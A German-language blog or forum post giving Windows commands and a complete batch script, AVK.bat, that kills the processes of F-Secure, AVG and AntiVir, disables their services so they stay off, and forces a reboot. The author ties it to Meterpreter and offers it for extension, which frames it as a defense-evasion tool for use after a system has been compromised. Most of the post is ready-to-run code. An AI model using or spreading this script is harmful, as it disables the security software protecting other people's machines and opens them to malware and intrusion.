Antiviren Programme zu beenden ist machmal etwas anstregend. Sehr oft reicht es nicht einfach die Prozesse zu beenden, da sie immer wieder neu starten. Wenn so etwas passiert steckt meistens ein Dienst/Service dahinter.
Um die Dienste in Windows sehen zu können reicht es die Datei services.msc zu starten.
Nicht immer kann ein Dienst einfach so beendet werden meist ist es nur möglich den Starttyp zu verändern, sodass bei erneutem Restart der Service nicht mehr mitstartet.
Um ein AV komplett zu beenden muss man alle Prozesse sowie Dienste killen und sicherstellen das diese nicht sofort erneut starten.
Windows Commands:
tasklist /svc | find "avg" >> zeigt Dienste an die mit "avg" anfangen
taskkill /f /im "avg" >> killt alle Prozesse die mit "avg" anfangen
sc queryex avg9emc >> zeigt Informationen zum Dienst avgwd
net stop avgwd >> Stoppt den Dienst avgwd
sc config avgwd start= disabled >> Setzt den Starttyp von avgwd auf disabled
Ich habe eine kleine .BAT Datei geschrieben die einem Arbeit erleichtert.
Mit dieser ist Es möglich AVG,AntiVir,Fsecure zu beenden. Natürlich kann sie erweitert werden.
Ich hoffe das danach das Prinzip klar wird.
Der Meterpreter besitzt ebenfalls ein Script. Das erweitert werden kann....(wenn man will)
AVK.bat
@echo off
cls
echo.
echo 1# F-Secure
echo 2# AVG 9.0.x / 10.0.x Free
echo 3# AntiVir Free
echo.
echo (NEED ADMIN PRIVS.)
echo.
SET /P a="Killing AV Nr. -->
if %a% EQU 1 goto fsec
if %a% EQU 2 goto avg
if %a% EQU 3 goto antivir
:fsec
cls
echo *## Killing F-Secure ##*
net stop FSAUA
net stop FSDFWD
net stop FSMA
net stop "F-Secure Network Request Broker"
net stop FSGKHS
taskkill /f /im fsgk32st.exe
taskkill /f /im fsgk32.exe
taskkill /f /im fssm32.exe
taskkill /f /im fsqh.exe
taskkill /f /im fsaua.exe
taskkill /f /im fsdfwd.exe
taskkill /f /im fsav32.exe
taskkill /f /im fsguidll.exe
taskkill /f /im FSMA32.EXE
taskkill /f /im FSMB32.EXE
taskkill /f /im FCH32.EXE
taskkill /f /im FAMEH32.EXE
taskkill /f /im FNRB32.exe
taskkill /f /im FIH32.exe
taskkill /f /im FSM32.EXE
taskkill /f /im FSLAUNCH.EXE
pause
exit
:avg
cls
echo *## Killing AVG 9.0.x / 10.0.x ##*
net stop avg9emc
sc config avg9wd start= disabled
sc config AVGIDSAgent start= disabled
sc config avgwd start= disabled
taskkill /f /im avgchsvx.exe
taskkill /f /im avgrsx.exe
taskkill /f /im avgcsrvx.exe
taskkill /f /im avgtray.exe
taskkill /f /im avgui.exe
taskkill /f /im avgwdsvc.exe
taskkill /f /im avgemc.exe
taskkill /f /im avgnsx.exe
taskkill /f /im avgcsrvx.exe
taskkill /f /im avgemcx.exe
taskkill /f /im avgmfapx.exe
taskkill /f /im AVGIDSAgent.exe
taskkill /f /im AVGIDSAgent.exe
taskkill /f /im AVGIDSMonitor.exe
sc config avg9wd start= demand
pause
cls
echo.
echo ** To kill AVG 10.0.x a restart is required.
echo ** After restart run AVK again for a complete AVG 10 kill!
echo ** 1/Yes 2/No
echo.
SET /P a="Restart -->
if %a% EQU 1 goto shutdown
if %a% EQU 2 goto exit
:antivir
cls
echo *## Killing AntiVir 10.0.0.x ##*
sc config AntiVirSchedulerService start= disabled
sc config AntiVirService start= disabled
taskkill /f /im
taskkill /f /im avguard.exe
taskkill /f /im avshadow.exe
taskkill /f /im avgnt.exe
taskkill /f /im avguard.exe
taskkill /f /im avshadow.exe
taskkill /f /im avgnt.exe
taskkill /f /im sched.exe
pause
cls
echo.
echo ** To kill AntiVir 10.0.0.x a restart is required.
echo ** After restart run AVK again for a complete AntiVir 10 kill!
echo ** 1/Yes 2/No
echo.
SET /P a="Restart -->
if %a% EQU 1 goto shutdown
if %a% EQU 2 goto exit
:exit
exit
:shutdown
cls
shutdown -r -f -t 0
exit
AVK.bat ENDE
einfach in eine Datei schreibe und name.bat benennen.
Verbesserungsvorschläge und weiter Ideen bitte an haezjagt@googlemail.com
haez
